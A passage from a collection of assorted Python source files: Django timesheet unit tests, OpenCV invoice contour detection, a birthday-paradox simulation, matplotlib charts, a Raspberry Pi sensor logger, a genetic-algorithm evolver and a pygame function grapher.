core_factories.create_project(other_user)\n other_activity = core_factories.create_activity(other_project)\n\n other_ts = factories.create_timesheet(\n other_user, state=Timesheet.STATE_OPEN, date=date_from_now(0))\n\n self.timesheet.register(offset=0, count=8, activity=self.activity)\n other_ts.register(offset=0, count=16, activity=other_activity)\n\n self.assertEqual(2.0, self.timesheet.usage.total)\n self.assertEqual(1, len(self.timesheet.usage.projects))\n self.assertEqual(4.0, other_ts.usage.total)\n self.assertEqual(1, len(other_ts.usage.projects))\n\n def test_all_quarters(self):\n self.timesheet.register(offset=0, count=48, activity=self.activity)\n quarters = self.timesheet.all_quarters\n empty_activity = Timesheet.create_empty_activity()\n empty_quarters = [True for quarter in quarters if quarter.activity ==\n empty_activity]\n filled_quarters = [True for quarter in quarters if quarter.activity !=\n empty_activity]\n\n self.assertEqual(len(empty_quarters), 48)\n self.assertEqual(len(filled_quarters), 48)\n\n def test_fake_quarters(self):\n fake_quarters = self.timesheet.fake_quarters\n self.assertIsInstance(fake_quarters[0], Quarter)\n self.assertEquals(len(fake_quarters), 96)\n\n def test_repr(self):\n self.assertNotIn(force_text(self.timesheet), EMPTY_VALUES)\n\n\nclass TimesheetManagerTests(CreateTestUserMixin, TestCase):\n def setUp(self):\n super(TimesheetManagerTests, self).setUp()\n self.timesheet = factories.create_timesheet(self.user)\n\n def test_my_timesheets(self):\n user2 = account_factories.create_standard_user()\n timesheet2 = factories.create_timesheet(user2)\n\n timesheets = Timesheet.objects.my_timesheets(self.user)\n\n self.assertIn(self.timesheet, timesheets)\n self.assertNotIn(timesheet2, timesheets)\n\n\nclass TimesheetStateTests(CreateTestUserMixin, TestCase):\n def test_open_to_submitted(self):\n timesheet = factories.create_timesheet(\n self.user, state=Timesheet.STATE_OPEN,\n date=date_from_now(0))\n self.assertTrue(timesheet.is_open)\n\n timesheet.set_state_submitted()\n self.assertTrue(Timesheet.objects.get(pk=timesheet.pk).is_submitted)\n\n def test_submitted_to_rejected(self):\n timesheet = factories.create_timesheet(\n self.user, state=Timesheet.STATE_SUBMITTED,\n date=date_from_now(0))\n self.assertTrue(timesheet.is_submitted)\n\n timesheet.set_state_rejected()\n self.assertTrue(Timesheet.objects.get(pk=timesheet.pk).is_rejected)\n\n def test_rejected_to_approved(self):\n timesheet = factories.create_timesheet(\n self.user, state=Timesheet.STATE_REJECTED,\n date=date_from_now(0))\n self.assertTrue(timesheet.is_rejected)\n\n timesheet.set_state_approved()\n self.assertTrue(Timesheet.objects.get(pk=timesheet.pk).is_approved)\n\n def test_approved_to_open(self):\n timesheet = factories.create_timesheet(\n self.user, state=Timesheet.STATE_APPROVED,\n date=date_from_now(0))\n self.assertTrue(timesheet.is_approved)\n\n timesheet.set_state_open()\n self.assertTrue(Timesheet.objects.get(pk=timesheet.pk).is_open)\n\n\nclass QuartersTests(CreateTestUserMixin, TestCase):\n def setUp(self):\n super(QuartersTests, self).setUp()\n self.project = core_factories.create_project(self.user)\n self.activity = core_factories.create_activity(self.project)\n self.timesheet = factories.create_timesheet(self.user)\n\n def test_create_duplicate_quarters(self):\n factories.create_quarter(self.timesheet, self.activity, 0)\n with self.assertRaises(IntegrityError):\n factories.create_quarter(self.timesheet, self.activity, 0)\n\n def test_out_of_bounds_offset(self):\n with self.assertRaises(IntegrityError):\n factories.create_quarter(self.timesheet, self.activity, -1)\n with self.assertRaises(IntegrityError):\n factories.create_quarter(self.timesheet, self.activity, 97)\n\n def test_full_timesheet(self):\n for offset in range(0, 96):\n factories.create_quarter(self.timesheet, self.activity, offset)\n self.assertEqual(96, self.timesheet.quarters.count())\n\n def test_repr(self):\n quarter = factories.create_quarter(self.timesheet, self.activity, 0)\n self.assertNotIn(force_text(quarter), EMPTY_VALUES)\n","sub_path":"quarterapp/quarterapp/timesheet/tests/test_timesheet.py","file_name":"test_timesheet.py","file_ext":"py","file_size_in_byte":10490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"194377107","text":"import cv2\nimport numpy as np\nimport imutils\nfrom imutils import contours\n\nimage = cv2.imread(\"commercial_invoice.jpg\")\norig = image.copy()\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n# edged = imutils.auto_canny(gray)\nbinary = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)[1]\n# cv2.imshow('binary', binary)\nheight, width = binary.shape\n# 获取所有竖线\nk1 = cv2.getStructuringElement(cv2.MORPH_RECT, (width // 30, 1))\nheroded = cv2.erode(binary, k1, iterations=1)\nhdilated = cv2.dilate(heroded, k1, iterations=1)\n# cv2.imshow('hdilated', hdilated)\n# hdilated_inv = cv2.bitwise_not(hdilated)\n# cv2.imshow('hdilated_inv', hdilated_inv)\n# 获取所有横线\nk2 = cv2.getStructuringElement(cv2.MORPH_RECT, (1, height // 30))\nveroded = cv2.erode(binary, k2, iterations=1)\nvdilated = cv2.dilate(veroded, k2, iterations=1)\n# cv2.imshow('vdilated', vdilated)\n# vdilated_inv = cv2.bitwise_not(vdilated)\n# cv2.imshow('vdilated', vdilated_inv)\n# 合并竖线和横线\nor_dilated = cv2.bitwise_or(vdilated, hdilated)\nedged = imutils.auto_canny(or_dilated)\n# find contours in the edge map using OpenCV 3\n(_, cnts, _) = cv2.findContours(edged.copy(), cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_SIMPLE)\ncv2.imwrite('edged.jpg', edged)\n# contour_sizes = [(cv2.contourArea(contour), contour) for contour in cnts]\n# print(contour_sizes)\n\ncnts = sorted(cnts, key=lambda c: cv2.contourArea(c), reverse=True)\nordered_contour_sizes = [(cv2.contourArea(contour), contour) for contour in cnts]\nprint(ordered_contour_sizes)\nimg = cv2.drawContours(image, [cnts[0]], -1, (0, 255, 0), 1) # 标记处编号为0的轮廓\nfor i in range(4):\n (x, y, w, h) = cv2.boundingRect(cnts[i])\n img = cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 2)\ncv2.imshow('max', img)\ncv2.waitKey(0)\n\n# loop over the (unsorted) contours and label them\nfor (i, c) in enumerate(cnts):\n orig = contours.label_contour(orig, c, i, color=(240, 0, 159))\n\n# show the original image\ncv2.imshow(\"Original\", orig)\n\n# loop over the sorting methods\nfor method in (\"left-to-right\", \"right-to-left\", \"top-to-bottom\", \"bottom-to-top\"):\n # sort the contours\n (cnts, boundingBoxes) = contours.sort_contours(cnts, method=method)\n clone = image.copy()\n\n # loop over the sorted contours and label them\n for (i, c) in enumerate(cnts):\n sortedImage = contours.label_contour(clone, c, i, color=(240, 0, 159))\n\n # show the sorted contour image\n cv2.imshow(method, sortedImage)\n\n# wait for a keypress\ncv2.waitKey(0)\n","sub_path":"commercial_invoice/invoce3.py","file_name":"invoce3.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"399147015","text":"\"\"\"\nOpdracht 18 - Experimentele verjaardagsparadox\nhttps://dodona.ugent.be/nl/exercises/1257408557/\n\"\"\"\n\nimport random\n\ndef checkDuplicates(duplicates):\n return len(duplicates) != len(set(duplicates))\n\n\ndef happenTogether(m: int, n: int):\n duplicates = []\n\n for i in range(0, n):\n duplicates.append(random.randint(1, m))\n\n return checkDuplicates(duplicates)\n\n\ndef estimateChance(m: int, n: int, tests: int):\n teller = 0\n\n for i in range(0, tests):\n if happenTogether(m, n) == True:\n teller = teller + 1\n\n return (teller / tests)\n\n\ndef main():\n print(happenTogether(6, 3))\n print(happenTogether(6, 3))\n\n print(estimateChance(6, 2, 10000))\n print(estimateChance(365, 23, 10000))\n\nif __name__ == '__main__':\n main()","sub_path":"week04/Experimentele verjaardagsparadox.py","file_name":"Experimentele verjaardagsparadox.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"92089182","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 3 11:51:57 2019\n\n@author: DELL-1\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport collections as cl\n\nmatplotlib.rcParams['font.sans-serif'] = ['SimHei'] \nmatplotlib.rcParams['font.family']='sans-serif'\nmatplotlib.rcParams['axes.unicode_minus'] = False\n\ndef experience_command(get_all_data):\n#get_all_data = get_all_data[\"experience\"].value_counts()\\\n get_all_data = cl.Counter(get_all_data['experience'])\n\n\n experience = ['经验不限',\n '经验应届毕业生',\n '经验1年以下',\n '经验1-3年',\n '经验3-5年',\n '经验5-10年',\n '经验10年以上']\n value = []\n for i in range(len(experience)):\n value.append(get_all_data[experience[i]])\n\n colors = ['yellow','yellowgreen','lightskyblue','springgreen','cyan','peachpuff','seashell']\n\n plt.figure(figsize=(10,10))\n plt.axes(aspect = 1)\n wedges, texts, autotexts = plt.pie(x = value,\n autopct = \"%.2f%%\",\n colors = colors,\n shadow = True)\n plt.legend(wedges,\n experience,\n fontsize = 12,\n title='经验情况分布',\n loc = 'center left',\n bbox_to_anchor = (1,0,0.15,1.7)\n )\n plt.title('经验需求')\n plt.savefig('C:/WeSite/DataCharts/岗位概况/相关要求/工作经验要求分布饼状图-100dpi.jpg',dpi=100,bbox_inches = 'tight')\n plt.show()\n","sub_path":"数据可视化/experience_command.py","file_name":"experience_command.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"237667024","text":"import Adafruit_DHT\nfrom pymongo import MongoClient\nclient=MongoClient(\"mongodb+srv://test:test@cluster0.glewd.mongodb.net/\")\ndb=client.get_database('demo_db')\nrecord=db.sensor_data\nDHT_SENSOR=Adafruit_DHT.DHT11\nDHT_PIN=4\nwhile True:\n\thum,temp=Adafruit_DHT.read(DHT_SENSOR,DHT_PIN)\n\tif temp:\n\t\trecord.update_one({'userId':'Tarun'},{'$set':{'temp':temp}})\n\t\trecord.update_one({'userId':'Tarun'},{'$set':{'humidity':hum}})\n\t\tprint(hum,temp)\n","sub_path":"Raspberry_Pi/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"142004512","text":"import random\nfrom .genome import Genome, GenomePlayer, Game\nimport sys\n\n\nclass Evolutore:\n def __init__(self, genometype: Genome.__class__, genomeplayertype: GenomePlayer.__class__,\n gametype: Game.__class__, individuals=150,\n mutate_prob=0.002, crossover_prob=0.004,\n elim_n=20, elitism=3, shared_sampling=30, hof=10):\n \"\"\"\n\n :type genometype: Genome.__class__\n :type genomeplayertype: GenomePlayer.__class__\n :type gametype: Game.__class__\n\n \"\"\"\n random.seed()\n # TIPI\n self.genometype = genometype\n self.genomeplayertype = genomeplayertype\n self.gametype = gametype\n # PARAMETRI\n self.mutate_prob = mutate_prob\n self.crossover_prob = crossover_prob\n self.elim_n = elim_n\n self.elitism = elitism\n self.shared_sampling = shared_sampling\n self.hof = hof\n # ALTRO\n self.individuals = individuals\n self.populations = [Population(genometype), Population(genometype)]\n self.last_results = [[], []]\n self.halls_of_fame = [[], []]\n self.generation = 0\n\n def evolve(self, generations):\n self._generate_populations()\n for i in range(generations):\n print(\"GENERAZIONE: %d\" % i)\n self._play_generation()\n print(\"EVOLUZIONE FINITA\")\n return self.halls_of_fame[0][-1]\n\n def _generate_populations(self):\n \"\"\"\n Crea una popolazione casuale e assegna ad ogni individuo un id.\n \"\"\"\n for j in range(2):\n self.populations[j].generate_new(self.individuals)\n\n def _play_generation(self):\n self.hall_of_fame = self.halls_of_fame[0]\n self._play_tournament()\n self._calculate_cfs()\n self._update_hall_of_fame()\n self._generate_new_population()\n self.populations[0], self.populations[1] = self.populations[1], self.populations[0]\n\n self.hall_of_fame = self.halls_of_fame[1]\n self._play_tournament()\n self._calculate_cfs()\n self._update_hall_of_fame()\n self._generate_new_population()\n self.populations[0], self.populations[1] = self.populations[1], self.populations[0]\n\n self.generation += 1\n\n def _play_tournament(self):\n \"\"\"\n Esegue un torneo tra la popolazione 0 e un sample della popolazione 1.\n \"\"\"\n sample = self._get_shared_sampling()\n hall_of_fame = self._get_hall_of_fame()\n sample.extend(hall_of_fame)\n coppie = [(x, y) for x in self.populations[0].individuals for y in sample]\n\n points = 50\n i = 0\n step = int(len(coppie) / points)\n print(\"Generando [\", end=\"\")\n print(\".\" * points, end=\"\")\n print(\"]\", end=\"\")\n print(\"\\b\" * points, end=\"\")\n\n for coppia in coppie:\n g0 = self.genomeplayertype(coppia[0])\n g1 = self.genomeplayertype(coppia[1])\n game = self.gametype()\n winner = game.play(g0, g1)\n\n if not hasattr(coppia[0], \"_beat\"):\n coppia[0]._beat = []\n if not hasattr(coppia[1], \"_beaten\"):\n coppia[1]._beaten = 0\n\n if winner == 0:\n coppia[0]._beat.append(coppia[1])\n coppia[1]._beaten += 1\n\n if i % step == 0:\n print(\"\\b=>\", end=\"\")\n sys.stdout.flush()\n i += 1\n print(\"\\b]\", end=\"\")\n print(\" Fatto\")\n\n def _calculate_cfs(self):\n \"\"\"\n Calcola il csf di ogni individuo.\n \"\"\"\n print(\"CALCOLANDO CFS\")\n for individuo in self.populations[0].individuals:\n individuo._cfs = 0\n for battuto in individuo._beat:\n individuo._cfs += 1 / battuto._beaten\n print(\"FINE\")\n\n def _get_shared_sampling(self):\n \"\"\"\n Crea un sample usando il shared sampling.\n :return: Un sample di genomi\n \"\"\"\n print(\"ELABORANDO SHARED SAMPLING\")\n if self.generation == 0:\n sample = self._get_random_sample(self.populations[1].individuals, self.shared_sampling)\n else:\n sample = []\n beaten = {}\n\n for i in range(self.shared_sampling):\n samp_fit = {}\n for genome in self.populations[1].individuals:\n if not hasattr(genome, \"_beat\") or genome in sample:\n continue\n samp_fit[genome] = 0\n for loser in genome._beat:\n if beaten.get(loser) is None:\n beaten[loser] = 0\n samp_fit[genome] += 1/(1+beaten[loser])\n winner = max(samp_fit.items(), key=(lambda x: x[1]))[0]\n sample.append(winner)\n for loser in winner._beat:\n beaten[loser] += 1\n print(\"FINE SHARED SAMPLING\")\n for genome in self.populations[1].individuals:\n genome._beat = []\n genome._beaten = 0\n return sample\n\n @staticmethod\n def _get_random_sample(l, n):\n \"\"\"\n Prende un sample casuale dalla lista data.\n :param l: Lista da cui prendere il sample\n :param n: Numero di elementi nel sample\n :return: Un sample casuale\n \"\"\"\n b = [x for x in range(len(l))]\n sample = []\n for i in range(n):\n try: # Se non ci sono abbastanza elementi li prende tutti\n sample.append(l[b.pop(random.randint(0, len(b) - 1))])\n except Exception:\n pass\n return sample\n\n def _get_hall_of_fame(self):\n \"\"\"\n :return: Una lista di elementi presi a caso dalla hall of fame\n \"\"\"\n return self._get_random_sample(self.hall_of_fame, self.hof)\n\n def _update_hall_of_fame(self):\n \"\"\"\n Aggiunge l'elemento migliore alla Hall of Fame.\n \"\"\"\n self.hall_of_fame.append(max(self.populations[0].individuals, key=(lambda x: x._cfs)))\n\n def _generate_new_population(self):\n \"\"\"\n Genera una nuova popolazione eliminando e ricreando individui.\n\n :return: Una nuova generazione\n \"\"\"\n elite = self._select_elite()\n self._remove_worst()\n coppie = self._make_couple_mating()\n self._crossover(coppie)\n self._mutate(elite)\n\n def _select_elite(self):\n \"\"\"\n Genera una lista con l'elite.\n\n :return: Una lista con l'elite\n \"\"\"\n elite = []\n for i in range(self.elitism):\n elite.append(max(self.populations[0].individuals, key=(lambda x: x._cfs if x not in elite else 0)))\n return elite\n\n def _make_couple_mating(self):\n \"\"\"\n Crea le coppie per ricreare la popolazione.\n\n :return: Una lista di coppie di genomi\n \"\"\"\n\n coppie = []\n for i in range(self.elim_n):\n likelihood = {}\n for genome in self.populations[0].individuals:\n likelihood[genome] = genome._cfs*random.random()\n coppia = [max(likelihood.items(), key=(lambda x: x[1]))[0]]\n coppia.append(max(likelihood.items(), key=(lambda x: x[1] if x[0] not in coppia else 0))[0])\n coppie.append(coppia)\n return coppie\n\n def _crossover(self, coppie):\n \"\"\"\n Aggiunge alla popolazione i figli degli individui selezionati.\n\n :param coppie: Le coppie di genomi da unire\n \"\"\"\n print(\"INIZIO CROSSOVER DI %d COPPIE\" % len(coppie))\n figli = []\n for coppia in coppie:\n figlio = coppia[0].crossover(coppia[1], self.crossover_prob)\n figli.append(figlio)\n self.populations[0].individuals.extend(figli)\n print(\"FINE CROSSOVER\")\n\n def _mutate(self, elite):\n \"\"\"\n Muta gli elementi della popolazione non presenti nell'elite\n :param elite: Una lista di individui nell'elite\n \"\"\"\n print(\"INIZIO MUTAZIONE\")\n for genoma in self.populations[0].individuals:\n if genoma not in elite:\n genoma.mutate(self.mutate_prob)\n print(\"FINE MUTAZIONE\")\n\n def _remove_worst(self):\n \"\"\"\n Elimina gli individui peggiori dal fitnesses.\n \"\"\"\n for i in range(self.elim_n):\n self.populations[0].remove_individual(min(self.populations[0].individuals, key=(lambda x: x._cfs)))\n\n\nclass Population:\n def __init__(self, genometype: Genome.__class__):\n self.individuals = []\n self.hall_of_fame = []\n self.genometype = genometype\n\n def generate_new(self, num):\n for i in range(num):\n genome = self.genometype.generate_random()\n self.individuals.append(genome)\n\n def remove_individual(self, el):\n \"\"\"\n Rimuove un individuo utilizzando il suo index.\n\n :param el: Il numero che indica quale individuo eliminare\n \"\"\"\n if isinstance(el, int):\n self.individuals.pop(el)\n elif isinstance(el, Genome):\n self.individuals.remove(el)\n else:\n raise ValueError(\"Valore del tipo sbagliato\")\n","sub_path":"evolutore.py","file_name":"evolutore.py","file_ext":"py","file_size_in_byte":9212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"561041295","text":"# -*- coding: utf-8 -*-\n# 現在日付と時刻だけを出すプログラム\n\nimport datetime\n\nclass output_text :\n # 初期処理\n def __init__(self) :\n print(\"start\")\n\n # 日付・時刻を出力する\n def output_date(self, mode = 0) :\n if mode == 1 :\n # \n print(datetime.date.today())\n elif mode == 2 :\n print(datetime.datetime.today())\n else :\n print(\"none\")","sub_path":"flask-begins/form.py","file_name":"form.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"378661976","text":"#!/usr/bin/env python\n\nimport sys\n\ndef get_centrality(filename):\n PG = []\n BT = []\n HB = []\n for l in open(filename):\n l = l.rstrip()\n g, pg, inputd, outd, bt, hb, a = l.split(',')\n\n PG.append( (g, pg) )\n BT.append( (g, bt) )\n HB.append( (g, hb) )\n\n PG = sorted(PG, key = lambda x : x[1], reverse=True)\n BT = sorted(BT, key = lambda x : x[1], reverse=True)\n HB = sorted(HB, key = lambda x : x[1], reverse=True)\n\n return (PG, BT, HB)\n\ndef get_clusters(filename = 'genes-cluster.txt'):\n GENE_CLUSTER = {}\n\n for l in open(filename):\n l = l.rstrip()\n\n gene, cluster = l.split(',')\n\n GENE_CLUSTER[gene] = cluster\n\n return GENE_CLUSTER\n\nGENE_CLUSTER = get_clusters()\n\nN = int(sys.argv[2])\nCLUSTER_ID = sys.argv[3]\n\nPG, BT, HB = get_centrality(sys.argv[1])\n\nKEK = [('PG', PG), ('BT', BT), ('HB', HB)]\n\nfor (tipo, RANK) in KEK:\n ENTRADA2 = open('classify-entrada-{0}.txt'.format(tipo), 'w')\n\n A_LIST = []\n for gene, rank in PG:\n if GENE_CLUSTER[gene] == CLUSTER_ID:\n A_LIST.append(gene)\n\n A_LIST = A_LIST[:N]\n\n # you have to keep matlab order\n for l in open('genes-cluster.txt'):\n l = l.rstrip()\n\n n, c_id = l.split(',')\n\n try:\n #if GENE_CLUSTER[n] == CLUSTER_ID:\n if c_id == CLUSTER_ID:\n if n in A_LIST:\n ENTRADA2.write('1\\n')\n else:\n ENTRADA2.write('0\\n')\n else:\n ENTRADA2.write('2\\n')\n except:\n ENTRADA2.write('2\\n')\n continue\n\n ENTRADA2.close()\n","sub_path":"2gera-entrada-classificador.py","file_name":"2gera-entrada-classificador.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"347380868","text":"import math, sys\nimport pygame as pg\nfrom pygame import *\nfrom math import *\nfrom graphics import *\n\npg.init()\n\nfont = pg.font.SysFont('Verdana', 16)\nfont2 = pg.font.SysFont('Serif', 24)\nWHITE = (255,255,255)\nBLACK = (0,0,0)\nBLUE = (0,0,200)\nPINK = (200,0,200) \nLIGHT_BLUE = (100,250,240) \nDARK_PINK = (200,0,150)\nRED = (200,0,0)\n\nwidth,height = 500,500\nextraW = 400\nscreen = pg.display.set_mode((width + extraW, height))\npg.display.set_caption(\"Super Awesome Function Grapher :D\")\n\ncolW = 80\nrowH = 50\ncol1x = width+10\ncol2x = width+colW+20\ncol3x = width+(2*colW)+30\ncol4x = width+(3*colW)+40\nrow1y = height/2 + 90\nrow2y = height/2 + 145\n\nk = 25\nequation = []\neq = \"\"\nmoveX, moveY = 0,0\n\n\ndef createGrid(k, moveX, moveY):\n screen.set_clip(0,0,width+10,height)\n screen.fill(WHITE)\n \n #draw graph paper\n for i in range(width//k):\n gridX = k*i\n gridY = k*i\n pg.draw.line(screen, LIGHT_BLUE, (gridX,0), (gridX,height), 1)\n pg.draw.line(screen, LIGHT_BLUE, (0,gridY), (width,gridY), 1)\n \n #last line \n pg.draw.line(screen, LIGHT_BLUE, (width,0), (width,height), 2)\n \n #x and y axis\n midX = (width+moveX)/(2)\n midY = (height+moveY)/(2)\n pg.draw.line(screen, BLACK, (midX, 0), (midX, height), 3)\n pg.draw.line(screen, BLACK, (0, midY), (width, midY), 3)\n \n #clip reset to entire window\n screen.set_clip(None)\n\ndef button(txt,x,y,w,h):\n mouse = pg.mouse.get_pos()\n pg.draw.rect(screen, DARK_PINK,(x,y,w,h))\n if x+w > mouse[0] > x and y+h > mouse[1] > y:\n pg.draw.rect(screen, LIGHT_BLUE,(x,y,w,h))\n btnTxt = font2.render(txt, 1, BLACK)\n btnCenter = ( (x+(w/8)), (y+(h/4)) )\n screen.blit(btnTxt, btnCenter)\n\n\n\ndef createInstructions():\n screen.set_clip(width+10,0,width+extraW,height)\n screen.fill(WHITE)\n \n title = font2.render(\"Super Awesome Function Grapher :D\", 1, BLUE)\n screen.blit(title, (width + 10, 10))\n \n instruct = font.render(\"Enter your equation: \", 1, BLACK)\n screen.blit(instruct, (width + 10, 60))\n \n instruct = font.render(\"Press [ENTER] when done or [q] to restart.\", 1, BLACK)\n screen.blit(instruct, (width + 10, 90))\n \n instruct = font.render(\"Press [BACKSPACE] to clear.\", 1, BLACK)\n screen.blit(instruct, (width + 10, 120))\n \n instruct = font.render(\"s=sin(), c=cos(), t=tan(), r=sqrt(), a=abs()\", 1, BLACK)\n screen.blit(instruct, (width + 10, 180))\n \n instruct = font.render(\"l=log10(), n=log(), e=e, p=pi\", 1, BLACK)\n screen.blit(instruct, (width + 10, 210))\n \n screen.set_clip(None)\n \n\n\ndef graphEq(eq, k, moveX, moveY):\n createGrid(k, moveX, moveY)\n screen.set_clip(0,0,width,height)\n \n if moveX < 0: \n #graphing of the equation\n for i in range(width):\n try: \n screen.set_clip(0,0,width,height)\n x = -((width+moveX)/2 - i)/float(k)\n y = eval(eq)\n pos1 = ((width+moveX)/2 + x * k, (height+moveY)/2 - y * k)\n \n nx = x = -((width+moveX)/2 - (i+1)) / float(k)\n ny = eval(eq)\n pos2 = ((width+moveX)/2 + nx * k, (height+moveY)/2 - ny * k)\n \n if (abs(y - ny) > 30):\n pg.draw.line(screen, RED, pos1, pos2, 3)\n else: \n pg.draw.line(screen, BLUE, pos1, pos2, 3)\n \n pg.display.update \n except:\n pass\n \n else: \n #graphing of the equation\n for i in range(width+moveX):\n try: \n screen.set_clip(0,0,width,height)\n x = ((width+moveX)/2 - i)/float(k)\n y = eval(eq)\n pos1 = ((width+moveX)/2 + x * k, (height+moveY)/2 - y * k)\n \n nx = x = ((width+moveX)/2 - (i+1)) / float(k)\n ny = eval(eq)\n pos2 = ((width+moveX)/2 + nx * k, (height+moveY)/2 - ny * k)\n \n if (abs(y - ny) > 30):\n pg.draw.line(screen, RED, pos1, pos2, 3)\n else: \n pg.draw.line(screen, BLUE, pos1, pos2, 3)\n \n pg.display.update \n except:\n pass\n\n\n\ndef main(equation, eq, k):\n \n done = False \n active = True\n moveX, moveY = 0,0\n \n createGrid(k, moveX, moveY)\n createInstructions()\n \n \n \n while active:\n #update the screen\n screen.set_clip(width+10, height-30, width+extraW, height)\n screen.fill(WHITE)\n screen.set_clip(None)\n \n #join equation array without commas\n eq = \" \".join(equation)\n eq = str.replace(eq,\" \", \"\")\n \n #render and blit equation\n eqShow = font.render(\"Function: y = \" + eq, 1, BLUE)\n screen.blit(eqShow, (width+10, height-30))\n \n mouse = pg.mouse.get_pos()\n click = pg.mouse.get_pressed()\n \n button(\"In\", col1x, row1y, colW, rowH)\n button(\"Out\", col1x, row2y, colW, rowH)\n button(\"Up\", col2x, row1y, colW, rowH)\n button(\"Down\", col2x, row2y, colW, rowH)\n button(\"Right\", col3x, row1y, colW, rowH)\n button(\"Left\", col3x, row2y, colW, rowH)\n button(\"Origin\", col4x, row1y, colW, 2*rowH+5)\n \n screen.set_clip(0,0,width,height)\n \n #Zoom in\n if col1x+colW > mouse[0] > col1x and row1y+rowH > mouse[1] > row1y:\n if click[0] == 1:\n if k < 50:\n k = k + 1\n createGrid(k, moveX, moveY)\n graphEq(eq, k, moveX, moveY)\n\n #Zoom out\n if col1x+colW > mouse[0] > col1x and row2y+rowH > mouse[1] > row2y:\n if click[0] == 1:\n if k > 14:\n k = k - 1\n createGrid(k, moveX, moveY)\n graphEq(eq, k, moveX, moveY) \n \n #Move up\n if col2x+colW > mouse[0] > col2x and row1y+rowH > mouse[1] > row1y:\n if click[0] == 1:\n moveY += 5\n createGrid(k, moveX, moveY)\n graphEq(eq, k, moveX, moveY)\n \n #Move down\n if col2x+colW > mouse[0] > col2x and row2y+rowH > mouse[1] > row2y:\n if click[0] == 1:\n moveY -= 5\n createGrid(k, moveX, moveY)\n graphEq(eq, k, moveX, moveY)\n \n #Move right\n if col3x+colW > mouse[0] > col3x and row1y+rowH > mouse[1] > row1y:\n if click[0] == 1:\n moveX -= 5\n createGrid(k, moveX, moveY)\n graphEq(eq, k, moveX, moveY)\n \n #Move left\n if col3x+colW > mouse[0] > col3x and row2y+rowH > mouse[1] > row2y:\n if click[0] == 1:\n moveX += 5\n createGrid(k, moveX, moveY)\n graphEq(eq, k, moveX, moveY)\n \n #Origin\n if col4x+colW > mouse[0] > col4x and row2y+rowH > mouse[1] > row1y:\n if click[0] == 1:\n moveX = 0\n moveY = 0\n k = 25\n createGrid(k, moveX, moveY)\n graphEq(eq, k, moveX, moveY)\n \n pg.display.update()\n\n #keyboard and mouse commands\n for event in pg.event.get(): \n \n if event.type == pg.QUIT:\n active = False\n done = True \n \n elif event.type == pg.KEYDOWN:\n \n #math operators\n if event.unicode == u'*':\n equation.append(\"*\")\n elif event.unicode == u'/':\n equation.append(\"/\")\n elif event.unicode == u'-':\n equation.append(\"-\")\n elif event.unicode == u'+':\n equation.append(\"+\")\n elif event.unicode == u'.':\n equation.append(\".\")\n elif event.unicode == u')':\n equation.append(\")\")\n elif event.unicode == u'(':\n equation.append(\"(\")\n \n #numbers typed in for equation and x variable\n if event.unicode == u'1':\n equation.append(\"1\")\n elif event.unicode == u'2':\n equation.append(\"2\")\n elif event.unicode == '3':\n equation.append(\"3\")\n elif event.unicode == u'4':\n equation.append(\"4\")\n elif event.unicode == u'5':\n equation.append(\"5\")\n elif event.unicode == u'6':\n equation.append(\"6\")\n elif event.unicode == u'7':\n equation.append(\"7\")\n elif event.unicode == u'8':\n equation.append(\"8\")\n elif event.unicode == u'9':\n equation.append(\"9\")\n elif event.unicode == u'0':\n equation.append(\"0\")\n \n #math functions\n elif event.unicode == u's':\n equation.append(\"sin(\")\n elif event.unicode == u'c':\n equation.append(\"cos(\")\n elif event.unicode == u't':\n equation.append(\"tan(\")\n elif event.unicode == u'r':\n equation.append(\"sqrt(\")\n elif event.unicode == u'a':\n equation.append(\"abs(\")\n elif event.unicode == u'l':\n equation.append(\"log10(\")\n elif event.unicode == u'n':\n equation.append(\"log(\")\n elif event.unicode == u'e':\n equation.append(\"e\")\n elif event.unicode == u'p':\n equation.append(\"pi\")\n \n \n elif event.unicode == u'x':\n equation.append(\"x\") \n elif event.key == K_RETURN:\n graphEq(eq, k, moveX, moveY) \n elif event.key == K_BACKSPACE:\n equation = []\n elif event.unicode == u'q':\n main([], \"\", 25)\n \n \n \n if done:\n pg.QUIT\n sys.exit()\n\n\n\nmain(equation, eq, k)\n ","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":10650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"3947136","text":"# first we need is the webcam\nimport cv2, numpy as np\n\n# change the value of argument by 0 for default webcam, or by webcam ID\ncap = cv2.VideoCapture(0)\n# ID number three for width\ncap.set(3, 640)\n# ID number four for height\ncap.set(4, 480)\n# ID number ten for brightness\ncap.set(10, 100)\n\nmyColors = [[25,130,215,179,255,255]]\n\n# DEFINE COLOR\ndef findColor(img, myColors):\n # 1. convert into HSV space\n imgHSV = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n # 2. create a mask to filter out our images\n for color in myColors:\n lower = np.array( color[0:3] )\n upper = np.array( color[3:6] )\n mask = cv2.inRange(imgHSV, lower, upper)\n\n getContour(mask)\n # cv2.imshow(str(color[0]), mask)\n\ndef getContour(img):\n contours, hierarchy = cv2.findContours(img, cv2.RETR_EXTERNAL, 